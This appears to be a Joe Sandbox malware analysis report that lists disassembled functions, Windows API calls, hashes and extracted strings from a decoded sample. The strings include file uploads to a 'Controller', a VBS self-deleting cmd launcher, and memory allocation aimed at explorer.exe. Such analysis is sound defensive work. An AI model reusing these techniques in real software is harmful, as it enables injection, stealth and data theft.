                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                        • String ID: /stext "$HDG$HDG$>G$>G
                                        • API String ID: 1223786279-3931108886
                                        • Opcode ID: dd84fb7e7cdabf2e47e208a23127d8f86efb5b2e25be2ef0fbb16d0b89917122
                                        • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                        • Opcode Fuzzy Hash: dd84fb7e7cdabf2e47e208a23127d8f86efb5b2e25be2ef0fbb16d0b89917122
                                        • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                        • GetCursorPos.USER32(?), ref: 0041CB08
                                        • SetForegroundWindow.USER32(?), ref: 0041CB11
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                        • ExitProcess.KERNEL32 ref: 0041CB84
                                        • CreatePopupMenu.USER32 ref: 0041CB8A
                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                        • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                        • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                        • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Info
                                        • String ID:
                                        • API String ID: 2509303402-0
                                        • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                        • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                        • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                        • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                        • __aulldiv.LIBCMT ref: 00407FE9
                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                        • CloseHandle.KERNEL32(00000000), ref: 00408200
                                        • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                        • CloseHandle.KERNEL32(00000000), ref: 00408256
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                        • API String ID: 1884690901-3066803209
                                        • Opcode ID: b4bf83234e7876ad0386de0079e022938b9164f4f2de2980decd81bcee1f3e40
                                        • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                        • Opcode Fuzzy Hash: b4bf83234e7876ad0386de0079e022938b9164f4f2de2980decd81bcee1f3e40
                                        • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                        • String ID: \ws2_32$\wship6$getaddrinfo
                                        • API String ID: 2490988753-3078833738
                                        • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                        • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                        • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                        • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 004500C1
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                        • _free.LIBCMT ref: 004500B6
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 004500D8
                                        • _free.LIBCMT ref: 004500ED
                                        • _free.LIBCMT ref: 004500F8
                                        • _free.LIBCMT ref: 0045011A
                                        • _free.LIBCMT ref: 0045012D
                                        • _free.LIBCMT ref: 0045013B
                                        • _free.LIBCMT ref: 00450146
                                        • _free.LIBCMT ref: 0045017E
                                        • _free.LIBCMT ref: 00450185
                                        • _free.LIBCMT ref: 004501A2
                                        • _free.LIBCMT ref: 004501BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                        • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                        • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                        • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0041913D
                                        • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                        • Sleep.KERNEL32(000003E8), ref: 0041927D
                                        • GetLocalTime.KERNEL32(?), ref: 0041928C
                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                        • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                        • API String ID: 489098229-65789007
                                        • Opcode ID: 9197c4a2a1c1e5ce950a89398449fe3ef2bf9bb46c4814cba73f7eb8f52c582d
                                        • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                        • Opcode Fuzzy Hash: 9197c4a2a1c1e5ce950a89398449fe3ef2bf9bb46c4814cba73f7eb8f52c582d
                                        • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                        APIs
                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                        • ExitProcess.KERNEL32 ref: 0040C832
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                        • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                        • API String ID: 1913171305-390638927
                                        • Opcode ID: 9d9593f7d2fff8419b7a4165c874335f1e1c4ca55b8004b043af397299dbfd4c
                                        • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                        • Opcode Fuzzy Hash: 9d9593f7d2fff8419b7a4165c874335f1e1c4ca55b8004b043af397299dbfd4c
                                        • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                        • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                        • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                        • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                        • closesocket.WS2_32(000000FF), ref: 0040481F
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                        • String ID:
                                        • API String ID: 3658366068-0
                                        • Opcode ID: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                        • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                        • Opcode Fuzzy Hash: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                        • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                                        APIs
                                          • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                        • GetLastError.KERNEL32 ref: 00454AA6
                                        • __dosmaperr.LIBCMT ref: 00454AAD
                                        • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                        • GetLastError.KERNEL32 ref: 00454AC3
                                        • __dosmaperr.LIBCMT ref: 00454ACC
                                        • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                        • CloseHandle.KERNEL32(?), ref: 00454C36
                                        • GetLastError.KERNEL32 ref: 00454C68
                                        • __dosmaperr.LIBCMT ref: 00454C6F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                        • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                        • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                        • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 65535$udp
                                        • API String ID: 0-1267037602
                                        • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                        • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                        • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                        • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                        APIs
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                        • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                        • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                        • String ID: <$@$@FG$@FG$TUF$Temp
                                        • API String ID: 1107811701-4124992407
                                        • Opcode ID: 2ef96a9cb1d95fb64f0202d71f3a89862d1029e439683586224ce07dc8cb56e9
                                        • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                        • Opcode Fuzzy Hash: 2ef96a9cb1d95fb64f0202d71f3a89862d1029e439683586224ce07dc8cb56e9
                                        • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                        • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe), ref: 00406705
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentProcess
                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$pUF$windir$BG3i@
                                        • API String ID: 2050909247-1144799832
                                        • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                        • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                        • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                        • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                        • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                        • __dosmaperr.LIBCMT ref: 004393DD
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                        • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                        • __dosmaperr.LIBCMT ref: 0043941A
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                        • __dosmaperr.LIBCMT ref: 0043946E
                                        • _free.LIBCMT ref: 0043947A
                                        • _free.LIBCMT ref: 00439481
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
